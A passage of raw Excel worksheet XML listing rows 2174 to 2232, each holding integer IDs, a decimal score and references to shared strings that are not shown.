      </c>
      <c r="B2174">
        <v>2867</v>
      </c>
      <c r="C2174">
        <v>2867</v>
      </c>
      <c r="D2174">
        <v>1</v>
      </c>
      <c r="E2174">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2174" t="s">
        <v>3911</v>
      </c>
      <c r="G2174" t="s">
        <v>4289</v>
      </c>
      <c r="H2174" t="s">
        <v>4290</v>
      </c>
    </row>
    <row r="2175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2175" s="1">
        <v>2173</v>
      </c>
      <c r="B2175">
        <v>6513</v>
      </c>
      <c r="C2175">
        <v>6513</v>
      </c>
      <c r="D2175">
        <v>1</v>
      </c>
      <c r="E2175">
        <v>0.55419999361038208</v>
      </c>
      <c r="F2175" t="s">
        <v>3911</v>
      </c>
      <c r="G2175" t="s">
        <v>4291</v>
      </c>
      <c r="H2175" t="s">
        <v>4292</v>
      </c>
    </row>
    <row r="2176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2176" s="1">
        <v>2174</v>
      </c>
      <c r="B2176">
        <v>2873</v>
      </c>
      <c r="C2176">
        <v>2873</v>
      </c>
      <c r="D2176">
        <v>1</v>
      </c>
      <c r="E2176">
        <v>0.99370002746582031</v>
      </c>
      <c r="F2176" t="s">
        <v>3911</v>
      </c>
      <c r="G2176" t="s">
        <v>4293</v>
      </c>
      <c r="H2176" t="s">
        <v>4294</v>
      </c>
    </row>
    <row r="2177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2177" s="1">
        <v>2175</v>
      </c>
      <c r="B2177">
        <v>5689</v>
      </c>
      <c r="C2177">
        <v>5689</v>
      </c>
      <c r="D2177">
        <v>1</v>
      </c>
      <c r="E2177">
        <v>0.96799999475479126</v>
      </c>
      <c r="F2177" t="s">
        <v>3911</v>
      </c>
      <c r="G2177" t="s">
        <v>4295</v>
      </c>
      <c r="H2177" t="s">
        <v>4296</v>
      </c>
    </row>
    <row r="2178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2178" s="1">
        <v>2176</v>
      </c>
      <c r="B2178">
        <v>5716</v>
      </c>
      <c r="C2178">
        <v>5716</v>
      </c>
      <c r="D2178">
        <v>1</v>
      </c>
      <c r="E2178">
        <v>0.99970000982284546</v>
      </c>
      <c r="F2178" t="s">
        <v>3911</v>
      </c>
      <c r="G2178" t="s">
        <v>4297</v>
      </c>
      <c r="H2178" t="s">
        <v>4298</v>
      </c>
    </row>
    <row r="2179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2179" s="1">
        <v>2177</v>
      </c>
      <c r="B2179">
        <v>6185</v>
      </c>
      <c r="C2179">
        <v>6185</v>
      </c>
      <c r="D2179">
        <v>1</v>
      </c>
      <c r="E2179">
        <v>0.83569997549057007</v>
      </c>
      <c r="F2179" t="s">
        <v>3911</v>
      </c>
      <c r="G2179" t="s">
        <v>4299</v>
      </c>
      <c r="H2179" t="s">
        <v>4300</v>
      </c>
    </row>
    <row r="2180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2180" s="1">
        <v>2178</v>
      </c>
      <c r="B2180">
        <v>5656</v>
      </c>
      <c r="C2180">
        <v>5656</v>
      </c>
      <c r="D2180">
        <v>1</v>
      </c>
      <c r="E2180">
        <v>0.95020002126693726</v>
      </c>
      <c r="F2180" t="s">
        <v>3911</v>
      </c>
      <c r="G2180" t="s">
        <v>4301</v>
      </c>
      <c r="H2180" t="s">
        <v>4302</v>
      </c>
    </row>
    <row r="2181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2181" s="1">
        <v>2179</v>
      </c>
      <c r="B2181">
        <v>2570</v>
      </c>
      <c r="C2181">
        <v>2570</v>
      </c>
      <c r="D2181">
        <v>1</v>
      </c>
      <c r="E2181">
        <v>0.99470001459121704</v>
      </c>
      <c r="F2181" t="s">
        <v>3911</v>
      </c>
      <c r="G2181" t="s">
        <v>4303</v>
      </c>
      <c r="H2181" t="s">
        <v>4304</v>
      </c>
    </row>
    <row r="2182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2182" s="1">
        <v>2180</v>
      </c>
      <c r="B2182">
        <v>2571</v>
      </c>
      <c r="C2182">
        <v>2571</v>
      </c>
      <c r="D2182">
        <v>1</v>
      </c>
      <c r="E2182">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2182" t="s">
        <v>3911</v>
      </c>
      <c r="G2182" t="s">
        <v>4305</v>
      </c>
      <c r="H2182" t="s">
        <v>4306</v>
      </c>
    </row>
    <row r="2183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2183" s="1">
        <v>2181</v>
      </c>
      <c r="B2183">
        <v>3850</v>
      </c>
      <c r="C2183">
        <v>3850</v>
      </c>
      <c r="D2183">
        <v>1</v>
      </c>
      <c r="E2183">
        <v>0.99959999322891235</v>
      </c>
      <c r="F2183" t="s">
        <v>3911</v>
      </c>
      <c r="G2183" t="s">
        <v>4307</v>
      </c>
      <c r="H2183" t="s">
        <v>4308</v>
      </c>
    </row>
    <row r="2184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2184" s="1">
        <v>2182</v>
      </c>
      <c r="B2184">
        <v>7793</v>
      </c>
      <c r="C2184">
        <v>7793</v>
      </c>
      <c r="D2184">
        <v>1</v>
      </c>
      <c r="E2184">
        <v>0.82899999618530273</v>
      </c>
      <c r="F2184" t="s">
        <v>3911</v>
      </c>
      <c r="G2184" t="s">
        <v>4309</v>
      </c>
      <c r="H2184" t="s">
        <v>4310</v>
      </c>
    </row>
    <row r="2185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2185" s="1">
        <v>2183</v>
      </c>
      <c r="B2185">
        <v>3209</v>
      </c>
      <c r="C2185">
        <v>3209</v>
      </c>
      <c r="D2185">
        <v>1</v>
      </c>
      <c r="E2185">
        <v>0.99769997596740723</v>
      </c>
      <c r="F2185" t="s">
        <v>3911</v>
      </c>
      <c r="G2185" t="s">
        <v>4311</v>
      </c>
      <c r="H2185" t="s">
        <v>4312</v>
      </c>
    </row>
    <row r="2186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2186" s="1">
        <v>2184</v>
      </c>
      <c r="B2186">
        <v>4217</v>
      </c>
      <c r="C2186">
        <v>4217</v>
      </c>
      <c r="D2186">
        <v>1</v>
      </c>
      <c r="E2186">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2186" t="s">
        <v>3911</v>
      </c>
      <c r="G2186" t="s">
        <v>4313</v>
      </c>
      <c r="H2186" t="s">
        <v>4314</v>
      </c>
    </row>
    <row r="2187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2187" s="1">
        <v>2185</v>
      </c>
      <c r="B2187">
        <v>3208</v>
      </c>
      <c r="C2187">
        <v>3208</v>
      </c>
      <c r="D2187">
        <v>1</v>
      </c>
      <c r="E2187">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2187" t="s">
        <v>3911</v>
      </c>
      <c r="G2187" t="s">
        <v>4315</v>
      </c>
      <c r="H2187" t="s">
        <v>4316</v>
      </c>
    </row>
    <row r="2188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2188" s="1">
        <v>2186</v>
      </c>
      <c r="B2188">
        <v>6511</v>
      </c>
      <c r="C2188">
        <v>6511</v>
      </c>
      <c r="D2188">
        <v>1</v>
      </c>
      <c r="E2188">
        <v>0.99570000171661377</v>
      </c>
      <c r="F2188" t="s">
        <v>3911</v>
      </c>
      <c r="G2188" t="s">
        <v>4317</v>
      </c>
      <c r="H2188" t="s">
        <v>4318</v>
      </c>
    </row>
    <row r="2189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2189" s="1">
        <v>2187</v>
      </c>
      <c r="B2189">
        <v>2877</v>
      </c>
      <c r="C2189">
        <v>2877</v>
      </c>
      <c r="D2189">
        <v>1</v>
      </c>
      <c r="E2189">
        <v>0.59939998388290405</v>
      </c>
      <c r="F2189" t="s">
        <v>3911</v>
      </c>
      <c r="G2189" t="s">
        <v>4319</v>
      </c>
      <c r="H2189" t="s">
        <v>4320</v>
      </c>
    </row>
    <row r="2190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2190" s="1">
        <v>2188</v>
      </c>
      <c r="B2190">
        <v>5653</v>
      </c>
      <c r="C2190">
        <v>5653</v>
      </c>
      <c r="D2190">
        <v>1</v>
      </c>
      <c r="E2190">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2190" t="s">
        <v>3911</v>
      </c>
      <c r="G2190" t="s">
        <v>4321</v>
      </c>
      <c r="H2190" t="s">
        <v>4322</v>
      </c>
    </row>
    <row r="2191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2191" s="1">
        <v>2189</v>
      </c>
      <c r="B2191">
        <v>3882</v>
      </c>
      <c r="C2191">
        <v>3882</v>
      </c>
      <c r="D2191">
        <v>1</v>
      </c>
      <c r="E2191">
        <v>0.9968000054359436</v>
      </c>
      <c r="F2191" t="s">
        <v>3911</v>
      </c>
      <c r="G2191" t="s">
        <v>4323</v>
      </c>
      <c r="H2191" t="s">
        <v>4324</v>
      </c>
    </row>
    <row r="2192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2192" s="1">
        <v>2190</v>
      </c>
      <c r="B2192">
        <v>271</v>
      </c>
      <c r="C2192">
        <v>271</v>
      </c>
      <c r="D2192">
        <v>1</v>
      </c>
      <c r="E2192">
        <v>0.84839999675750732</v>
      </c>
      <c r="F2192" t="s">
        <v>3911</v>
      </c>
      <c r="G2192" t="s">
        <v>4325</v>
      </c>
      <c r="H2192" t="s">
        <v>4326</v>
      </c>
    </row>
    <row r="2193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2193" s="1">
        <v>2191</v>
      </c>
      <c r="B2193">
        <v>5655</v>
      </c>
      <c r="C2193">
        <v>5655</v>
      </c>
      <c r="D2193">
        <v>1</v>
      </c>
      <c r="E2193">
        <v>0.8978000283241272</v>
      </c>
      <c r="F2193" t="s">
        <v>3911</v>
      </c>
      <c r="G2193" t="s">
        <v>4327</v>
      </c>
      <c r="H2193" t="s">
        <v>4328</v>
      </c>
    </row>
    <row r="2194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2194" s="1">
        <v>2192</v>
      </c>
      <c r="B2194">
        <v>6236</v>
      </c>
      <c r="C2194">
        <v>6236</v>
      </c>
      <c r="D2194">
        <v>1</v>
      </c>
      <c r="E2194">
        <v>0.95099997520446777</v>
      </c>
      <c r="F2194" t="s">
        <v>3911</v>
      </c>
      <c r="G2194" t="s">
        <v>4329</v>
      </c>
      <c r="H2194" t="s">
        <v>4330</v>
      </c>
    </row>
    <row r="2195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2195" s="1">
        <v>2193</v>
      </c>
      <c r="B2195">
        <v>6512</v>
      </c>
      <c r="C2195">
        <v>6512</v>
      </c>
      <c r="D2195">
        <v>1</v>
      </c>
      <c r="E2195">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2195" t="s">
        <v>3911</v>
      </c>
      <c r="G2195" t="s">
        <v>4331</v>
      </c>
      <c r="H2195" t="s">
        <v>4332</v>
      </c>
    </row>
    <row r="2196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2196" s="1">
        <v>2194</v>
      </c>
      <c r="B2196">
        <v>272</v>
      </c>
      <c r="C2196">
        <v>272</v>
      </c>
      <c r="D2196">
        <v>1</v>
      </c>
      <c r="E2196">
        <v>0.94749999046325684</v>
      </c>
      <c r="F2196" t="s">
        <v>3911</v>
      </c>
      <c r="G2196" t="s">
        <v>4333</v>
      </c>
      <c r="H2196" t="s">
        <v>4334</v>
      </c>
    </row>
    <row r="2197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2197" s="1">
        <v>2195</v>
      </c>
      <c r="B2197">
        <v>2580</v>
      </c>
      <c r="C2197">
        <v>2580</v>
      </c>
      <c r="D2197">
        <v>1</v>
      </c>
      <c r="E2197">
        <v>0.63309997320175171</v>
      </c>
      <c r="F2197" t="s">
        <v>3911</v>
      </c>
      <c r="G2197" t="s">
        <v>4335</v>
      </c>
      <c r="H2197" t="s">
        <v>4336</v>
      </c>
    </row>
    <row r="2198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2198" s="1">
        <v>2196</v>
      </c>
      <c r="B2198">
        <v>3203</v>
      </c>
      <c r="C2198">
        <v>3203</v>
      </c>
      <c r="D2198">
        <v>1</v>
      </c>
      <c r="E2198">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2198" t="s">
        <v>3911</v>
      </c>
      <c r="G2198" t="s">
        <v>4337</v>
      </c>
      <c r="H2198" t="s">
        <v>4338</v>
      </c>
    </row>
    <row r="2199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2199" s="1">
        <v>2197</v>
      </c>
      <c r="B2199">
        <v>2865</v>
      </c>
      <c r="C2199">
        <v>2865</v>
      </c>
      <c r="D2199">
        <v>1</v>
      </c>
      <c r="E2199">
        <v>0.77060002088546753</v>
      </c>
      <c r="F2199" t="s">
        <v>3911</v>
      </c>
      <c r="G2199" t="s">
        <v>4339</v>
      </c>
      <c r="H2199" t="s">
        <v>4340</v>
      </c>
    </row>
    <row r="2200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2200" s="1">
        <v>2198</v>
      </c>
      <c r="B2200">
        <v>2863</v>
      </c>
      <c r="C2200">
        <v>2863</v>
      </c>
      <c r="D2200">
        <v>1</v>
      </c>
      <c r="E2200">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2200" t="s">
        <v>3911</v>
      </c>
      <c r="G2200" t="s">
        <v>4341</v>
      </c>
      <c r="H2200" t="s">
        <v>4342</v>
      </c>
    </row>
    <row r="2201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2201" s="1">
        <v>2199</v>
      </c>
      <c r="B2201">
        <v>2606</v>
      </c>
      <c r="C2201">
        <v>2606</v>
      </c>
      <c r="D2201">
        <v>1</v>
      </c>
      <c r="E2201">
        <v>0.78769999742507935</v>
      </c>
      <c r="F2201" t="s">
        <v>3911</v>
      </c>
      <c r="G2201" t="s">
        <v>4343</v>
      </c>
      <c r="H2201" t="s">
        <v>4344</v>
      </c>
    </row>
    <row r="2202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2202" s="1">
        <v>2200</v>
      </c>
      <c r="B2202">
        <v>7679</v>
      </c>
      <c r="C2202">
        <v>7679</v>
      </c>
      <c r="D2202">
        <v>1</v>
      </c>
      <c r="E2202">
        <v>0.99489998817443848</v>
      </c>
      <c r="F2202" t="s">
        <v>3911</v>
      </c>
      <c r="G2202" t="s">
        <v>4345</v>
      </c>
      <c r="H2202" t="s">
        <v>4346</v>
      </c>
    </row>
    <row r="2203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2203" s="1">
        <v>2201</v>
      </c>
      <c r="B2203">
        <v>6537</v>
      </c>
      <c r="C2203">
        <v>6537</v>
      </c>
      <c r="D2203">
        <v>1</v>
      </c>
      <c r="E2203">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2203" t="s">
        <v>3911</v>
      </c>
      <c r="G2203" t="s">
        <v>4347</v>
      </c>
      <c r="H2203" t="s">
        <v>4348</v>
      </c>
    </row>
    <row r="2204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2204" s="1">
        <v>2202</v>
      </c>
      <c r="B2204">
        <v>4162</v>
      </c>
      <c r="C2204">
        <v>4162</v>
      </c>
      <c r="D2204">
        <v>1</v>
      </c>
      <c r="E2204">
        <v>0.93220001459121704</v>
      </c>
      <c r="F2204" t="s">
        <v>3911</v>
      </c>
      <c r="G2204" t="s">
        <v>4349</v>
      </c>
      <c r="H2204" t="s">
        <v>4350</v>
      </c>
    </row>
    <row r="2205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2205" s="1">
        <v>2203</v>
      </c>
      <c r="B2205">
        <v>6164</v>
      </c>
      <c r="C2205">
        <v>6164</v>
      </c>
      <c r="D2205">
        <v>1</v>
      </c>
      <c r="E2205">
        <v>0.73629999160766602</v>
      </c>
      <c r="F2205" t="s">
        <v>3911</v>
      </c>
      <c r="G2205" t="s">
        <v>4351</v>
      </c>
      <c r="H2205" t="s">
        <v>4352</v>
      </c>
    </row>
    <row r="2206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2206" s="1">
        <v>2204</v>
      </c>
      <c r="B2206">
        <v>6523</v>
      </c>
      <c r="C2206">
        <v>6523</v>
      </c>
      <c r="D2206">
        <v>1</v>
      </c>
      <c r="E2206">
        <v>0.99059998989105225</v>
      </c>
      <c r="F2206" t="s">
        <v>3911</v>
      </c>
      <c r="G2206" t="s">
        <v>4353</v>
      </c>
      <c r="H2206" t="s">
        <v>4354</v>
      </c>
    </row>
    <row r="2207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2207" s="1">
        <v>2205</v>
      </c>
      <c r="B2207">
        <v>286</v>
      </c>
      <c r="C2207">
        <v>286</v>
      </c>
      <c r="D2207">
        <v>1</v>
      </c>
      <c r="E2207">
        <v>0.50410002470016479</v>
      </c>
      <c r="F2207" t="s">
        <v>3911</v>
      </c>
      <c r="G2207" t="s">
        <v>4355</v>
      </c>
      <c r="H2207" t="s">
        <v>4356</v>
      </c>
    </row>
    <row r="2208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2208" s="1">
        <v>2206</v>
      </c>
      <c r="B2208">
        <v>5715</v>
      </c>
      <c r="C2208">
        <v>5715</v>
      </c>
      <c r="D2208">
        <v>1</v>
      </c>
      <c r="E2208">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2208" t="s">
        <v>3911</v>
      </c>
      <c r="G2208" t="s">
        <v>4357</v>
      </c>
      <c r="H2208" t="s">
        <v>4358</v>
      </c>
    </row>
    <row r="2209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2209" s="1">
        <v>2207</v>
      </c>
      <c r="B2209">
        <v>4163</v>
      </c>
      <c r="C2209">
        <v>4163</v>
      </c>
      <c r="D2209">
        <v>1</v>
      </c>
      <c r="E2209">
        <v>0.94199997186660767</v>
      </c>
      <c r="F2209" t="s">
        <v>3911</v>
      </c>
      <c r="G2209" t="s">
        <v>4359</v>
      </c>
      <c r="H2209" t="s">
        <v>4360</v>
      </c>
    </row>
    <row r="2210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2210" s="1">
        <v>2208</v>
      </c>
      <c r="B2210">
        <v>5283</v>
      </c>
      <c r="C2210">
        <v>5283</v>
      </c>
      <c r="D2210">
        <v>1</v>
      </c>
      <c r="E2210">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2210" t="s">
        <v>3911</v>
      </c>
      <c r="G2210" t="s">
        <v>4361</v>
      </c>
      <c r="H2210" t="s">
        <v>4362</v>
      </c>
    </row>
    <row r="2211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2211" s="1">
        <v>2209</v>
      </c>
      <c r="B2211">
        <v>2848</v>
      </c>
      <c r="C2211">
        <v>2848</v>
      </c>
      <c r="D2211">
        <v>1</v>
      </c>
      <c r="E2211">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2211" t="s">
        <v>3911</v>
      </c>
      <c r="G2211" t="s">
        <v>4363</v>
      </c>
      <c r="H2211" t="s">
        <v>4364</v>
      </c>
    </row>
    <row r="2212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2212" s="1">
        <v>2210</v>
      </c>
      <c r="B2212">
        <v>3869</v>
      </c>
      <c r="C2212">
        <v>3869</v>
      </c>
      <c r="D2212">
        <v>1</v>
      </c>
      <c r="E2212">
        <v>0.9966999888420105</v>
      </c>
      <c r="F2212" t="s">
        <v>3911</v>
      </c>
      <c r="G2212" t="s">
        <v>4365</v>
      </c>
      <c r="H2212" t="s">
        <v>4366</v>
      </c>
    </row>
    <row r="2213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2213" s="1">
        <v>2211</v>
      </c>
      <c r="B2213">
        <v>4165</v>
      </c>
      <c r="C2213">
        <v>4165</v>
      </c>
      <c r="D2213">
        <v>1</v>
      </c>
      <c r="E2213">
        <v>0.93120002746582031</v>
      </c>
      <c r="F2213" t="s">
        <v>3911</v>
      </c>
      <c r="G2213" t="s">
        <v>4367</v>
      </c>
      <c r="H2213" t="s">
        <v>4368</v>
      </c>
    </row>
    <row r="2214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2214" s="1">
        <v>2212</v>
      </c>
      <c r="B2214">
        <v>288</v>
      </c>
      <c r="C2214">
        <v>288</v>
      </c>
      <c r="D2214">
        <v>1</v>
      </c>
      <c r="E2214">
        <v>0.98769998550415039</v>
      </c>
      <c r="F2214" t="s">
        <v>3911</v>
      </c>
      <c r="G2214" t="s">
        <v>4369</v>
      </c>
      <c r="H2214" t="s">
        <v>4370</v>
      </c>
    </row>
    <row r="2215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2215" s="1">
        <v>2213</v>
      </c>
      <c r="B2215">
        <v>4174</v>
      </c>
      <c r="C2215">
        <v>4174</v>
      </c>
      <c r="D2215">
        <v>1</v>
      </c>
      <c r="E2215">
        <v>0.63630002737045288</v>
      </c>
      <c r="F2215" t="s">
        <v>3911</v>
      </c>
      <c r="G2215" t="s">
        <v>4371</v>
      </c>
      <c r="H2215" t="s">
        <v>4372</v>
      </c>
    </row>
    <row r="2216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2216" s="1">
        <v>2214</v>
      </c>
      <c r="B2216">
        <v>289</v>
      </c>
      <c r="C2216">
        <v>289</v>
      </c>
      <c r="D2216">
        <v>1</v>
      </c>
      <c r="E2216">
        <v>0.97450000047683716</v>
      </c>
      <c r="F2216" t="s">
        <v>3911</v>
      </c>
      <c r="G2216" t="s">
        <v>4373</v>
      </c>
      <c r="H2216" t="s">
        <v>4374</v>
      </c>
    </row>
    <row r="2217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2217" s="1">
        <v>2215</v>
      </c>
      <c r="B2217">
        <v>3172</v>
      </c>
      <c r="C2217">
        <v>3172</v>
      </c>
      <c r="D2217">
        <v>1</v>
      </c>
      <c r="E2217">
        <v>0.58730000257492065</v>
      </c>
      <c r="F2217" t="s">
        <v>3911</v>
      </c>
      <c r="G2217" t="s">
        <v>4375</v>
      </c>
      <c r="H2217" t="s">
        <v>4376</v>
      </c>
    </row>
    <row r="2218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2218" s="1">
        <v>2216</v>
      </c>
      <c r="B2218">
        <v>3170</v>
      </c>
      <c r="C2218">
        <v>3170</v>
      </c>
      <c r="D2218">
        <v>1</v>
      </c>
      <c r="E2218">
        <v>0.86180001497268677</v>
      </c>
      <c r="F2218" t="s">
        <v>3911</v>
      </c>
      <c r="G2218" t="s">
        <v>4377</v>
      </c>
      <c r="H2218" t="s">
        <v>4378</v>
      </c>
    </row>
    <row r="2219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2219" s="1">
        <v>2217</v>
      </c>
      <c r="B2219">
        <v>2658</v>
      </c>
      <c r="C2219">
        <v>2658</v>
      </c>
      <c r="D2219">
        <v>1</v>
      </c>
      <c r="E2219">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2219" t="s">
        <v>3911</v>
      </c>
      <c r="G2219" t="s">
        <v>4379</v>
      </c>
      <c r="H2219" t="s">
        <v>4380</v>
      </c>
    </row>
    <row r="2220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2220" s="1">
        <v>2218</v>
      </c>
      <c r="B2220">
        <v>4169</v>
      </c>
      <c r="C2220">
        <v>4169</v>
      </c>
      <c r="D2220">
        <v>1</v>
      </c>
      <c r="E2220">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2220" t="s">
        <v>3911</v>
      </c>
      <c r="G2220" t="s">
        <v>4381</v>
      </c>
      <c r="H2220" t="s">
        <v>4382</v>
      </c>
    </row>
    <row r="2221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2221" s="1">
        <v>2219</v>
      </c>
      <c r="B2221">
        <v>3101</v>
      </c>
      <c r="C2221">
        <v>3101</v>
      </c>
      <c r="D2221">
        <v>1</v>
      </c>
      <c r="E2221">
        <v>0.56339997053146362</v>
      </c>
      <c r="F2221" t="s">
        <v>3911</v>
      </c>
      <c r="G2221" t="s">
        <v>4383</v>
      </c>
      <c r="H2221" t="s">
        <v>4384</v>
      </c>
    </row>
    <row r="2222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2222" s="1">
        <v>2220</v>
      </c>
      <c r="B2222">
        <v>7774</v>
      </c>
      <c r="C2222">
        <v>7774</v>
      </c>
      <c r="D2222">
        <v>1</v>
      </c>
      <c r="E2222">
        <v>0.81339997053146362</v>
      </c>
      <c r="F2222" t="s">
        <v>3911</v>
      </c>
      <c r="G2222" t="s">
        <v>4385</v>
      </c>
      <c r="H2222" t="s">
        <v>4386</v>
      </c>
    </row>
    <row r="2223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2223" s="1">
        <v>2221</v>
      </c>
      <c r="B2223">
        <v>2630</v>
      </c>
      <c r="C2223">
        <v>2630</v>
      </c>
      <c r="D2223">
        <v>1</v>
      </c>
      <c r="E2223">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2223" t="s">
        <v>3911</v>
      </c>
      <c r="G2223" t="s">
        <v>4387</v>
      </c>
      <c r="H2223" t="s">
        <v>4388</v>
      </c>
    </row>
    <row r="2224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2224" s="1">
        <v>2222</v>
      </c>
      <c r="B2224">
        <v>4036</v>
      </c>
      <c r="C2224">
        <v>4036</v>
      </c>
      <c r="D2224">
        <v>1</v>
      </c>
      <c r="E2224">
        <v>0.99940001964569092</v>
      </c>
      <c r="F2224" t="s">
        <v>3911</v>
      </c>
      <c r="G2224" t="s">
        <v>4389</v>
      </c>
      <c r="H2224" t="s">
        <v>4390</v>
      </c>
    </row>
    <row r="2225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2225" s="1">
        <v>2223</v>
      </c>
      <c r="B2225">
        <v>2628</v>
      </c>
      <c r="C2225">
        <v>2628</v>
      </c>
      <c r="D2225">
        <v>1</v>
      </c>
      <c r="E2225">
        <v>0.81279999017715454</v>
      </c>
      <c r="F2225" t="s">
        <v>3911</v>
      </c>
      <c r="G2225" t="s">
        <v>4391</v>
      </c>
      <c r="H2225" t="s">
        <v>4392</v>
      </c>
    </row>
    <row r="2226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2226" s="1">
        <v>2224</v>
      </c>
      <c r="B2226">
        <v>559</v>
      </c>
      <c r="C2226">
        <v>559</v>
      </c>
      <c r="D2226">
        <v>1</v>
      </c>
      <c r="E2226">
        <v>0.99309998750686646</v>
      </c>
      <c r="F2226" t="s">
        <v>3911</v>
      </c>
      <c r="G2226" t="s">
        <v>4393</v>
      </c>
      <c r="H2226" t="s">
        <v>4394</v>
      </c>
    </row>
    <row r="2227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2227" s="1">
        <v>2225</v>
      </c>
      <c r="B2227">
        <v>6226</v>
      </c>
      <c r="C2227">
        <v>6226</v>
      </c>
      <c r="D2227">
        <v>1</v>
      </c>
      <c r="E2227">
        <v>0.80879998207092285</v>
      </c>
      <c r="F2227" t="s">
        <v>3911</v>
      </c>
      <c r="G2227" t="s">
        <v>4395</v>
      </c>
      <c r="H2227" t="s">
        <v>4396</v>
      </c>
    </row>
    <row r="2228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2228" s="1">
        <v>2226</v>
      </c>
      <c r="B2228">
        <v>2609</v>
      </c>
      <c r="C2228">
        <v>2609</v>
      </c>
      <c r="D2228">
        <v>1</v>
      </c>
      <c r="E2228">
        <v>0.45390000939369202</v>
      </c>
      <c r="F2228" t="s">
        <v>3911</v>
      </c>
      <c r="G2228" t="s">
        <v>4397</v>
      </c>
      <c r="H2228" t="s">
        <v>4398</v>
      </c>
    </row>
    <row r="2229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2229" s="1">
        <v>2227</v>
      </c>
      <c r="B2229">
        <v>7676</v>
      </c>
      <c r="C2229">
        <v>7676</v>
      </c>
      <c r="D2229">
        <v>1</v>
      </c>
      <c r="E2229">
        <v>0.99720001220703125</v>
      </c>
      <c r="F2229" t="s">
        <v>3911</v>
      </c>
      <c r="G2229" t="s">
        <v>4399</v>
      </c>
      <c r="H2229" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="2230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2230" s="1">
        <v>2228</v>
      </c>
      <c r="B2230">
        <v>3862</v>
      </c>
      <c r="C2230">
        <v>3862</v>
      </c>
      <c r="D2230">
        <v>1</v>
      </c>
      <c r="E2230">
        <v>0.96950000524520874</v>
      </c>
      <c r="F2230" t="s">
        <v>3911</v>
      </c>
      <c r="G2230" t="s">
        <v>4401</v>
      </c>
      <c r="H2230" t="s">
        <v>4402</v>
      </c>
    </row>
    <row r="2231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2231" s="1">
        <v>2229</v>
      </c>
      <c r="B2231">
        <v>5408</v>
      </c>
      <c r="C2231">
        <v>5408</v>
      </c>
      <c r="D2231">
        <v>1</v>
      </c>
      <c r="E2231">
        <v>0.99299997091293335</v>
      </c>
      <c r="F2231" t="s">
        <v>3911</v>
      </c>
      <c r="G2231" t="s">
        <v>4403</v>
      </c>
      <c r="H2231" t="s">
        <v>4404</v>
      </c>
    </row>
    <row r="2232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2232" s="1">
        <v>2230</v>
      </c>
      <c r="B2232">
        <v>6287</v>
      </c>
      <c r="C2232">
        <v>6287</v>
      </c>
      <c r="D2232">
        <v>1</v>
      </c>
      <c r="E2232">
        <v>0.51999998092651367</v>
